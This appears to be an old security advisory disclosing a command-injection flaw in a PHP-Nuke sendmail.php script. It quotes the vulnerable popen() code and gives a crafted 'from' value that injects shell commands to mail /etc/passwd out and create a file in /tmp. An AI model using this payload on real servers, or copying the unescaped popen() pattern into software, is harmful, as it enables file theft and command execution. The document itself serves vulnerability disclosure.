PHP-Nuke Written by Sequioa Software contains sendmail.php, which allows remote users to execute commands and see files on the web server.
15b60f966f6d41df63275f87611839fefc622ea85815d79655554d3868a7aa03
Sequoiasoft's sendmail php script dangerous - By jwilkins
PHP-Nuke Written by Sequioa Software, this script allows execution of
arbitrary code by a malicious user.
Written by Sequioa Software, this script allows execution of arbitrary
code by a malicious user. Essentially, popen() executes a shell which
does the actual interpretation of the command. If an attacker crafts
their return email address carefully, then they can cause the popen()
call to execute chosen commands or reveal files.
//The workhorse method, does the actual sending of the mail.
//Doesn't check for errors so be careful!
function Send($sendmail = "/usr/sbin/sendmail") {
if($this->from == "") {
$fp = popen($sendmail . " -i " . $this->to, "w");
} else {
$fp = popen($sendmail . " -i -f"" . $this->from . "" " .
$this->to, "w");
}
Given the above code fragment, if I provide a from line such as:
foo@bat.com" jwilkins@bitland.net < /etc/passwd; touch /tmp/gotcha;
I can have the contents of any file that the webserver account (usually
nobody) has access to, and can execute commands as that user.